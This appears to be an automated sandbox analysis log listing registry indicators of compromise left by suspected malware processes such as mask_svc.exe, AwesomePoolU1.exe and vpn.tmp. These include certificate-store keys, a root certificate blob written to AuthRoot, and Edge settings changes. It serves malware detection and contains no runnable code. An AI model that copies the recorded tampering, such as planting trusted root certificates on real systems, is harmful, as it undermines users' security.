\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople app.exe Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exereg.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exevpn.tmpMicrosoftEdgeCP.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy reg.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 vpn.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000647a46d896bf019fe67bcad8c9a2b0b26c1aadbb8aef5a1723bc57b059727e71acfb2299bd5b9b728847f0ff05038af051c4ddcd0395d43a19c6 reg.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" reg.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c59365ac2c1cd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" reg.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe -
Processes:
askinstall20.exeAwesomePoolU1.exetapinstall.exevpn.tmpdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b